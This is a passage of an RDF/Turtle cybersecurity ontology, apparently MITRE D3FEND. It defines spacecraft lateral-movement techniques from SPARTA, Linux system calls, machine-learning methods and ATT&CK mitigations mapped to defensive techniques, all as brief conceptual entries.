d3f:attack-id "LM-0003" ; d3f:definition "Threat actors may attempt to command another neighboring spacecraft via crosslink. spacecraft in close proximity are often able to send commands back and forth. Threat actors may be able to leverage this access to compromise another spacecraft." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTALateralMovementTechnique ; skos:prefLabel "Constellation Hopping via Crosslink" . d3f:LM-0004 a owl:Class ; rdfs:label "Visiting Vehicle Interface(s) - SPARTA" ; d3f:attack-id "LM-0004" ; d3f:definition "Threat actors may move from one spacecraft to another through visiting vehicle interfaces. When a vehicle docks with a spacecraft, many programs are automatically triggered in order to ensure docking mechanisms are locked. This entails several data points and commands being sent to and from the spacecraft and the visiting vehicle. If a threat actor were to compromise a visiting vehicle, they could target these specific programs in order to send malicious commands to the victim spacecraft once docked." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTALateralMovementTechnique ; skos:prefLabel "Visiting Vehicle Interface(s)" . d3f:LM-0005 a owl:Class ; rdfs:label "Virtualization Escape - SPARTA" ; d3f:attack-id "LM-0005" ; d3f:definition "In virtualized environments, threat actors can use the open ports between the partitions to overcome the hypervisor's protection and damage another partition. Further, if the threat actor has compromised the payload, access to a critical partition can be gained through ports allowed by hypervisor." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTALateralMovementTechnique ; skos:prefLabel "Virtualization Escape" . d3f:LM-0006.01 a owl:Class ; rdfs:label "Rideshare Payload - SPARTA" ; d3f:attack-id "LM-0006.01" ; d3f:definition "Threat actors may attempt to move laterally between multiple co-located payloads onboard the same launch vehicle during shared launch missions (i.e., rideshare configurations). This differs from lateral movement between spacecraft subsystems or onboard hosted payloads. In this case, each payload may belong to a different customer or organization, but they share the same physical transport infrastructure. If insufficient isolation or segmentation exists between payloads during launch integration (e.g., shared avionics bus, data interface, or environmental control), threat actors may exploit the launch vehicle interface to enable cross-payload access or data compromise before separation." ; rdfs:seeAlso ; rdfs:subClassOf d3f:LM-0006 ; skos:prefLabel "Rideshare Payload" . d3f:LM-0007 a owl:Class ; rdfs:label "Credentialed Traversal - SPARTA" ; d3f:attack-id "LM-0007" ; d3f:definition "Threat actors may leverage valid credentials to traverse across spacecraft subsystems, communication buses, or even to access other spacecraft within a constellation, all while avoiding detection. These credentials may include system service accounts, user accounts, maintenance credentials, cryptographic keys, or other authentication mechanisms that grant authorized access. Rather than exploiting vulnerabilities, this technique relies on the reuse or misuse of trusted credentials to move laterally within the space system architecture. When access control boundaries are weak, flat, or poorly enforced, valid credentials can enable attackers to reach restricted functions or domains without raising alarms. This traversal allows evasion of isolation mechanisms and facilitates further actions without triggering traditional anomaly detection tied to unauthorized access attempts." ; rdfs:seeAlso ; rdfs:subClassOf d3f:SPARTALateralMovementTechnique ; skos:prefLabel "Credentialed Traversal" . d3f:LaptopComputer a owl:Class ; rdfs:label "Laptop Computer" ; d3f:definition "A laptop computer (also laptop), is a small, portable personal computer (PC) with a \"clamshell\" form factor, typically having a thin LCD or LED computer screen mounted on the inside of the upper lid of the clamshell and an alphanumeric keyboard on the inside of the lower lid. The clamshell is opened up to use the computer. Laptops are folded shut for transportation, and thus are suitable for mobile use. Its name comes from lap, as it was deemed to be placed on a person's lap when being used. Although originally there was a distinction between laptops and notebooks (the former being bigger and heavier than the latter), as of 2014, there is often no longer any difference. Today, laptops are commonly used in a variety of settings, such as at work, in education, for playing games, web browsing" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:PersonalComputer ; skos:altLabel "Laptop", "Notebook" . d3f:LevenshteinMatching a owl:Class, owl:NamedIndividual ; rdfs:label "Levenschtein Matching" ; d3f:d3fend-id "D3A-LM" ; d3f:definition "The Levenshtein distance (LD) is a metric for measuring the differences between two sequences - or strings. Informally, the LD is the number of individual edits one would have to make to turn one sequence into another." ; d3f:kb-article """## References 1. Navarro, G. (2001). A guided tour to approximate string matching. _ACM Computing Surveys_, 33(1), 31-88. [Link](https://doi.org/10.1145/375360.375365)""" ; d3f:synonym "Edit Distance" ; rdfs:subClassOf d3f:ApproximateStringMatching . d3f:LinearClassifier a owl:Class, owl:NamedIndividual ; rdfs:label "Linear Classifier" ; d3f:d3fend-id "D3A-LC" ; d3f:definition "A linear classifier is a model that makes a decision to categories a set of data points to a discrete class based on a linear combination of its explanatory variables" ; d3f:kb-article """## References A Look at the Maths Behind Linear Classification. Towards Data Science. [Link](https://towardsdatascience.com/a-look-at-the-maths-behind-linear-classification-166e99a9e5fb).""" ; rdfs:subClassOf d3f:Classification . d3f:LinearLogicProgramming a owl:Class, owl:NamedIndividual ; rdfs:label "Linear Logic Programming" ; d3f:d3fend-id "D3A-LLP" ; d3f:definition "Linear logic programming is a form of logic programming that uses linear logic, that is, it emphasizes the use of formulas as resources." ; d3f:kb-article """## References 1. Cosmo, R. and Miller D. (2019, May 24). _Linear logic_. Stanford Encyclopedia of Philosophy. [Link](https://plato.stanford.edu/entries/logic-linear/#LinLogComSci) 2. Linear logic programming. (2023, May 16). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Logic_programming#Linear_logic_programming)""" ; rdfs:subClassOf d3f:LogicProgramming . d3f:LinearRegressionLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Linear Regression Learning" ; d3f:d3fend-id "D3A-LRL" ; d3f:definition "A supervised learning method that builds a linear regression model using training data." ; d3f:kb-article """## References - Gawali, Suvarna. “Linear Regression Algorithm to Make Predictions Easily.” Analytics Vidhya, 22 July 2022, https://www.analyticsvidhya.com/blog/2021/06/linear-regression-in-machine-learning/. - Nau, Robert. “Statistical Forecasting: Notes On Regression and Time Series Analysis.” Introduction to Linear Regression Analysis, Duke University Fuqua School of Business, 18 Aug. 2020, https://people.duke.edu/~rnau/regintro.htm. - Ng, Ritchie. “Evaluating a Linear Regression Model.” Ritchieng.github.io, 8 Jan. 2023, https://www.ritchieng.com/machine-learning-evaluate-linear-regression-model/. - Bochkarev, Alexei. "A New Typology Design of Performance Metrics to Measure Errors in Machine Learning Regression Algorithms", 2019, https://www.researchgate.net/publication/330661543_A_New_Typology_Design_of_Performance_Metrics_to_Measure_Errors_in_Machine_Learning_Regression_Algorithms.""" ; rdfs:seeAlso d3f:LinearRegression ; rdfs:subClassOf d3f:RegressionAnalysisLearning . d3f:LinuxClone a owl:Class ; rdfs:label "Linux Clone" ; d3f:definition "Creates a child process and provides more precise control over the data shared between the parent and child processes." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateProcess . d3f:LinuxClone3 a owl:Class ; rdfs:label "Linux Clone3" ; d3f:definition """Creates a child process and provides more precise control over the data shared between the parent and child processes. Newer system call.""" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateProcess . d3f:LinuxClone3ArgumentCLONE_THREAD a owl:Class ; rdfs:label "Linux Clone3 Argument CLONE_THREAD" ; d3f:definition "A flag parameter to the Clone3 syscall. If set, the child is placed in the same thread group as the calling process." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateThread . d3f:LinuxCloneArgumentCLONE_THREAD a owl:Class ; rdfs:label "Linux Clone Argument CLONE_THREAD" ; d3f:definition "A flag parameter to the Clone syscall. If set, the child is placed in the same thread group as the calling process." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateThread . d3f:LinuxConnect a owl:Class ; rdfs:label "Linux Connect" ; d3f:definition "Initiate a connection on a socket." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIConnectSocket . d3f:LinuxCreat a owl:Class ; rdfs:label "Linux Creat" ; d3f:definition "Equivalent to calling Linux Open with flags equal to O_CREAT|O_WRONLY|O_TRUNC." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateFile . d3f:LinuxDeleteModule a owl:Class ; rdfs:label "Linux Delete Module" ; d3f:definition "Attempts to remove the unused loadable module entry identified by name. If the module has an exit function, then that function is executed before unloading the module." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIUnloadModule . d3f:LinuxELFFile32bit a d3f:ExecutableBinary, owl:NamedIndividual ; rdfs:label "Linux ELF File 32bit" ; d3f:definition "test" . d3f:LinuxELFFile64bit a d3f:ExecutableBinary, owl:NamedIndividual ; rdfs:label "Linux ELF File 64bit" . d3f:LinuxExecve a owl:Class ; rdfs:label "Linux Execve" ; d3f:definition "Executes a program by replacing the calling process with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments. The PID stays the same." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIExec . d3f:LinuxExecveat a owl:Class ; rdfs:label "Linux Execveat" ; d3f:definition "Execute program relative to a directory file descriptor. Behavior is similar to Linux Execve." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIExec . d3f:LinuxFork a owl:Class ; rdfs:label "Linux Fork" ; d3f:definition "Creates a child process with unique PID but retains parent PID as Parent Process Identifier (PPID)." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateProcess . d3f:LinuxInitModule a owl:Class ; rdfs:label "Linux Init_Module" ; d3f:definition "Loads an ELF image into kernel space, performs any necessary symbol relocations, initializes module parameters to values provided by the caller, and then runs the module's init function." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPILoadModule . d3f:LinuxKillArgumentSIGKILL a owl:Class ; rdfs:label "Linux Kill Argument SIGKILL" ; d3f:definition "Send SIGKILL signal to a process." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPITerminateProcess . d3f:LinuxMmap a owl:Class ; rdfs:label "Linux Mmap" ; d3f:definition "Map files or devices into memory." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIAllocateMemory . d3f:LinuxMmap2 a owl:Class ; rdfs:label "Linux Mmap2" ; d3f:definition "Map files or devices into memory." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIAllocateMemory . d3f:LinuxMunmap a owl:Class ; rdfs:label "Linux Munmap" ; d3f:definition "Unmap files or devices from memory." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIFreeMemory . d3f:LinuxOpenArgumentO_CREAT a owl:Class ; rdfs:label "Linux Open Argument O_CREAT" ; d3f:definition "Create a regular file." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateFile . d3f:LinuxOpenArgumentO_RDONLY-O_WRONLY-O_RDWR a owl:Class ; rdfs:label "Linux Open Argument O_RDONLY, O_WRONLY, O_RDWR" ; d3f:definition "Opens a file specified by pathname." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIOpenFile . d3f:LinuxOpenAt2ArgumentO_CREAT a owl:Class ; rdfs:label "Linux OpenAt2 Argument O_CREAT" ; d3f:definition "Create a regular file. Extension of Linux Openat." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateFile . d3f:LinuxOpenAt2ArgumentO_RDONLY-O_WRONLY-O_RDWR a owl:Class ; rdfs:label "Linux OpenAt2 Argument O_RDONLY, O_WRONLY, O_RDWR" ; d3f:definition "Extension of Linux Openat." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIOpenFile . d3f:LinuxOpenAtArgumentO_CREAT a owl:Class ; rdfs:label "Linux OpenAt Argument O_CREAT" ; d3f:definition "Create a regular file. Same functionality as Linux Open but slight differences in parameter." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateFile . d3f:LinuxOpenAtArgumentO_RDONLY-O_WRONLY-O_RDWR a owl:Class ; rdfs:label "Linux OpenAt Argument O_RDONLY, O_WRONLY, O_RDWR" ; d3f:definition "Same functionality as Linux Open but slight differences in parameter." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIOpenFile . d3f:LinuxPauseProcess a owl:Class ; rdfs:label "Linux Pause Process" ; d3f:definition "Causes the calling process to sleep until a signal is delivered that either terminates the process or causes the invocation of a signal-catching function." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPISuspendProcess . d3f:LinuxPauseThread a owl:Class ; rdfs:label "Linux Pause Thread" ; d3f:definition "Causes the calling thread to sleep until a signal is delivered that either terminates the thread or causes the invocation of a signal-catching function." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPISuspendThread . d3f:LinuxProcess a d3f:Process, owl:NamedIndividual ; rdfs:label "Linux Process" . d3f:LinuxPtraceArgumentPTRACEATTACH a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_ATTACH" ; d3f:definition "Attach to the process specified in pid, making it a tracee of the calling process." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIAccessProcess . d3f:LinuxPtraceArgumentPTRACECONT a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_CONT" ; d3f:definition "Restart the stopped tracee process." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIResumeProcess . d3f:LinuxPtraceArgumentPTRACEGETREGS a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_GETREGS" ; d3f:definition "Copy the tracee's general-purpose or floating-point registers, respectively, to the address data in the tracer." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPISaveRegisters . d3f:LinuxPtraceArgumentPTRACEINTERRUPT a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_INTERRUPT" ; d3f:definition "Stops a tracee." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPISuspendProcess . d3f:LinuxPtraceArgumentPTRACEPEEKTEXT a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_PEEKTEXT" ; d3f:definition "Read a word at the address addr in the tracee's memory, returning the word as the result of the ptrace() call." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIReadMemory . d3f:LinuxPtraceArgumentPTRACEPOKETEXT a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_POKETEXT" ; d3f:definition "Copy the word data to the address addr in the tracee's memory." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIWriteMemory . d3f:LinuxPtraceArgumentPTRACESETREGS a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_SETREGS" ; d3f:definition "Modify the tracee's general-purpose or floating-point registers, respectively, from the address data in the tracer." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPISetRegisters . d3f:LinuxPtraceArgumentPTRACE_DETACH a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_DETACH" ; d3f:definition "Restart the stopped tracee as for PTRACE_CONT, but first detach from it." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIResumeProcess . d3f:LinuxPtraceArgumentPTRACE_TRACEME a owl:Class ; rdfs:label "Linux Ptrace Argument PTRACE_TRACEME" ; d3f:definition "Indicates that the process is to be traced by its parent." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPITraceProcess . d3f:LinuxRead a owl:Class ; rdfs:label "Linux Read" ; d3f:definition "Read from a file descriptor." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIReadFile . d3f:LinuxReadv a owl:Class ; rdfs:label "Linux Readv" ; d3f:definition "Read data into multiple buffers." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIReadFile . d3f:LinuxRename a owl:Class ; rdfs:label "Linux Rename" ; d3f:definition "Change the name or location of a file." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIMoveFile . d3f:LinuxRenameat a owl:Class ; rdfs:label "Linux Renameat" ; d3f:definition "Change the name or location of a file. Different parameter handling than Linux Rename." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIMoveFile . d3f:LinuxRenameat2 a owl:Class ; rdfs:label "Linux Renameat2" ; d3f:definition "Change the name or location of a file. Additional flags argument." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIMoveFile . d3f:LinuxSocket a owl:Class ; rdfs:label "Linux Socket" ; d3f:definition "Create an endpoint for communication." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateSocket . d3f:LinuxSocketcallArgumentSYS_CONNECT a owl:Class ; rdfs:label "Linux Socketcall Argument SYS_CONNECT" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIConnectSocket . d3f:LinuxSocketcallArgumentSYS_SOCKET a owl:Class ; rdfs:label "Linux Socketcall Argument SYS_SOCKET" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateSocket . d3f:LinuxTime a owl:Class ; rdfs:label "Linux Time" ; d3f:definition "Get time in seconds." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIGetSystemTime . d3f:LinuxUnlink a owl:Class ; rdfs:label "Linux Unlink" ; d3f:definition "Delete a name and possibly the file it refers to." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIDeleteFile . d3f:LinuxUnlinkat a owl:Class ; rdfs:label "Linux Unlinkat" ; d3f:definition "Delete a name and possibly the file it refers to. Different parameter handling than Linux Unlink" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIDeleteFile . d3f:LinuxVfork a owl:Class ; rdfs:label "Linux Vfork" ; d3f:definition "Create child process that temp suspends parent process until it terminates." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPICreateProcess . d3f:LinuxWrite a owl:Class ; rdfs:label "Linux Write" ; d3f:definition "Write to a file descriptor." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIWriteFile . d3f:LinuxWritev a owl:Class ; rdfs:label "Linux Writev" ; d3f:definition "Write data into multiple buffers." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPIWriteFile . d3f:Linux_Exit a owl:Class ; rdfs:label "Linux _Exit" ; d3f:definition "Terminate the calling process." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:OSAPITerminateProcess . d3f:LocalAreaNetworkAttacker a owl:Class ; rdfs:label "Local Area Network Attacker" ; d3f:definition "An attacker who exploits vulnerabilities within the same local area network." ; d3f:synonym "LAN Attacker" ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:accesses ; owl:someValuesFrom d3f:LocalAreaNetwork ], d3f:LocalAttacker . d3f:LocalAuthenticationService a owl:Class, owl:NamedIndividual ; rdfs:label "Local Authentication Service" ; d3f:authenticates d3f:LocalUserAccount ; d3f:definition "A local authentication service running on a host can authenticate a user logged into just that local host computer." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:authenticates ; owl:someValuesFrom d3f:LocalUserAccount ], d3f:AuthenticationService . d3f:LocalAuthorizationService a owl:Class, owl:NamedIndividual ; rdfs:label "Local Authorization Service" ; d3f:authorizes d3f:LocalUserAccount ; d3f:definition "A local authorization service running on a host can authorize a user logged into just that local host computer." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:authorizes ; owl:someValuesFrom d3f:LocalUserAccount ], d3f:AuthorizationService . d3f:LogMessageFunction a owl:Class, owl:NamedIndividual ; rdfs:label "Log Message Function" ; d3f:definition "Produces an entry in a log." ; d3f:produces d3f:DigitalEventRecord ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:produces ; owl:someValuesFrom d3f:DigitalEventRecord ], d3f:Subroutine . d3f:LogististicRegressionLearning a owl:Class, owl:NamedIndividual ; rdfs:label "Logistic Regression Learning" ; d3f:d3fend-id "D3A-LRL" ; d3f:definition "A supervised learning method that builds a logistic regression model using training data." ; d3f:kb-article """## References Wikipedia. (n.d.). Logistic regression. [Link](https://en.wikipedia.org/wiki/Logistic_regression)""" ; rdfs:seeAlso d3f:LogisticRegression ; rdfs:subClassOf d3f:RegressionAnalysisLearning . d3f:LogoffEvent a owl:Class ; rdfs:label "Logoff Event" ; d3f:definition "An authentication event where an active session is conclusively terminated, resulting in the cessation of access and deallocation of resources associated with the session, ensuring that the connection to the system, application, or resource no longer exists." ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:has-participant ; owl:someValuesFrom d3f:Session ], [ a owl:Restriction ; owl:onProperty d3f:preceded-by ; owl:someValuesFrom d3f:LogonEvent ], d3f:AuthenticationEvent . d3f:LogonUser a owl:Class, owl:NamedIndividual ; rdfs:label "Logon User" ; d3f:authenticates d3f:UserAccount ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:authenticates ; owl:someValuesFrom d3f:UserAccount ], d3f:SystemCall . d3f:LongShort-termMemory a owl:Class, owl:NamedIndividual ; rdfs:label "Long Short-term Memory" ; d3f:d3fend-id "D3A-LSTM" ; d3f:definition "Unlike standard feedforward neural networks, LSTM has feedback connections. Such a recurrent neural network (RNN) can process not only single data points (such as images), but also entire sequences of data (such as speech or video). This characteristic makes LSTM networks ideal for processing and predicting data" ; d3f:kb-article """## References Wikipedia. (2021, September 29). Long short-term memory. [Link](https://en.wikipedia.org/wiki/Long_short-term_memory)""" ; rdfs:subClassOf d3f:RecurrentNeuralNetwork . d3f:LuaScriptFile a d3f:ExecutableScript, owl:NamedIndividual ; rdfs:label "Lua Script File" . d3f:M1013 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Application Developer Guidance" ; d3f:d3fend-comment "A future release of D3FEND will define a taxonomy of Source Code Hardening Techniques." . d3f:M1015 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Active Directory Configuration" ; d3f:d3fend-comment "M1015 scope is broad, touches on an wide variety of techniques in D3FEND." ; d3f:related d3f:AuthenticationCacheInvalidation, d3f:DomainTrustPolicy, d3f:UserAccountPermissions . d3f:M1016 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Vulnerability Scanning" ; d3f:d3fend-comment "Future D3FEND releases will model the scanning and inventory domains." . d3f:M1017 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "User Training" ; d3f:d3fend-comment "Modeling user training is outside the scope of D3FEND." . d3f:M1018 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "User Account Management" ; d3f:related d3f:LocalFilePermissions, d3f:SystemCallFiltering, d3f:SystemConfigurationPermissions . d3f:M1019 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Threat Intelligence Program" ; d3f:d3fend-comment "Establishing and running a Threat Intelligence Program is outside the scope of D3FEND." . d3f:M1020 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "SSL/TLS Inspection" ; d3f:d3fend-comment "D3FEND models this as an infrastructure dependency to support D3-NTA." ; d3f:related d3f:NetworkTrafficAnalysis . d3f:M1021 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Restrict Web-Based Content" ; d3f:d3fend-comment "M1021 scope is broad, touches on an wide variety of techniques in d3fend." ; d3f:related d3f:DNSAllowlisting, d3f:DNSDenylisting, d3f:FileAnalysis, d3f:InboundTrafficFiltering, d3f:NetworkTrafficAnalysis, d3f:OutboundTrafficFiltering, d3f:URLAnalysis . d3f:M1022 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Restrict File and Directory Permissions" ; d3f:related d3f:LocalFilePermissions . d3f:M1024 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Restrict Registry Permission" ; d3f:related d3f:SystemConfigurationPermissions . d3f:M1025 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Privileged Process Integrity" ; d3f:related d3f:BootloaderAuthentication, d3f:DriverLoadIntegrityChecking, d3f:ProcessSegmentExecutionPrevention, d3f:SystemCallFiltering . d3f:M1026 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Privileged Account Management" ; d3f:related d3f:DomainAccountMonitoring, d3f:LocalAccountMonitoring, d3f:StrongPasswordPolicy . d3f:M1027 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Password Policies" ; d3f:related d3f:One-timePassword, d3f:StrongPasswordPolicy . d3f:M1028 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Operating System Configuration" ; d3f:related d3f:PlatformHardening . d3f:M1029 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Remote Data Storage" ; d3f:d3fend-comment "IT disaster recovery plans are outside the current scope of D3FEND." . d3f:M1030 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Network Segmentation" ; d3f:related d3f:BroadcastDomainIsolation, d3f:EncryptedTunnels, d3f:InboundSessionVolumeAnalysis, d3f:InboundTrafficFiltering . d3f:M1031 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Network Intrusion Prevention" ; d3f:related d3f:InboundTrafficFiltering, d3f:NetworkTrafficAnalysis, d3f:OutboundTrafficFiltering . d3f:M1032 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Multi-factor Authentication" ; d3f:related d3f:Multi-factorAuthentication . d3f:M1033 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Limit Software Installation" ; d3f:related d3f:ExecutableAllowlisting, d3f:ExecutableDenylisting . d3f:M1034 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Limit Hardware Installation" ; d3f:related d3f:IOPortRestriction . d3f:M1035 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Limit Access to Resource Over Network" ; d3f:related d3f:NetworkIsolation . d3f:M1036 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Account Use Policies" ; d3f:d3fend-comment "D3-AZET may be related (is potentially related though not called out in ATT&CK definition.)" ; d3f:related d3f:AccountLocking, d3f:AuthenticationCacheInvalidation, d3f:AuthenticationEventThresholding . d3f:M1037 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Filter Network Traffic" ; d3f:related d3f:NetworkIsolation . d3f:M1038 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Execution Prevention" ; d3f:related d3f:DriverLoadIntegrityChecking, d3f:ExecutableAllowlisting, d3f:ExecutableDenylisting, d3f:ProcessSegmentExecutionPrevention . d3f:M1039 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Environment Variable Permissions" ; d3f:related d3f:ApplicationConfigurationHardening, d3f:SystemFileAnalysis . d3f:M1040 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Behavior Prevention on Endpoint" ; d3f:related d3f:AuthenticationEventThresholding, d3f:AuthorizationEventThresholding, d3f:JobFunctionAccessPatternAnalysis, d3f:ResourceAccessPatternAnalysis, d3f:SessionDurationAnalysis, d3f:UserDataTransferAnalysis, d3f:UserGeolocationLogonPatternAnalysis, d3f:WebSessionActivityAnalysis . d3f:M1041 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Encrypt Sensitive Information" ; d3f:related d3f:DiskEncryption, d3f:EncryptedTunnels, d3f:FileEncryption, d3f:MessageEncryption . d3f:M1042 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Disable or Remove Feature or Program" ; d3f:related d3f:ApplicationConfigurationHardening, d3f:ExecutableDenylisting, d3f:SystemCallFiltering . d3f:M1043 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Credential Access Protection" ; d3f:related d3f:Hardware-basedProcessIsolation . d3f:M1044 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Restrict Library Loading" ; d3f:d3fend-comment "D3-SCF is one possible way to filter library loading." ; d3f:related d3f:SystemCallFiltering . d3f:M1045 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Code Signing" ; d3f:related d3f:DriverLoadIntegrityChecking, d3f:ExecutableAllowlisting, d3f:ServiceBinaryVerification . d3f:M1046 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Boot Integrity" ; d3f:related d3f:BootloaderAuthentication, d3f:TPMBootIntegrity . d3f:M1047 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Audit" ; d3f:d3fend-comment "M1047 scope is broad, touches on an wide variety of techniques in d3fend." ; d3f:related d3f:DomainAccountMonitoring, d3f:LocalAccountMonitoring, d3f:SystemFileAnalysis . d3f:M1048 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Application Isolation and Sandboxing" ; d3f:d3fend-comment "\"Sandboxing\" is often used to describe a detection environment which includes some forms of analysis (see D3-DA.)\" Many forms of isolation (e.g., quarantining) are more static in nature and simply limit software's access to system resources." ; d3f:related d3f:DynamicAnalysis, d3f:Hardware-basedProcessIsolation, d3f:SystemCallFiltering . d3f:M1049 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Antivirus/Antimalware" ; d3f:d3fend-comment "Process Analysis and subclasses." ; d3f:related d3f:FileContentRules, d3f:FileHashing, d3f:ProcessAnalysis . d3f:M1050 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Exploit Protection" ; d3f:related d3f:ApplicationHardening, d3f:ExceptionHandlerPointerValidation, d3f:InboundTrafficFiltering, d3f:ShadowStackComparisons . d3f:M1051 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Update Software" ; d3f:related d3f:SoftwareUpdate . d3f:M1052 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "User Account Control" ; d3f:related d3f:SystemCallFiltering . d3f:M1053 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label "Data Backup" ; d3f:d3fend-comment "Comprehensive IT disaster recovery plans are outside the current scope of D3FEND." . d3f:M1054 a d3f:ATTACKEnterpriseMitigation, owl:NamedIndividual ; rdfs:label 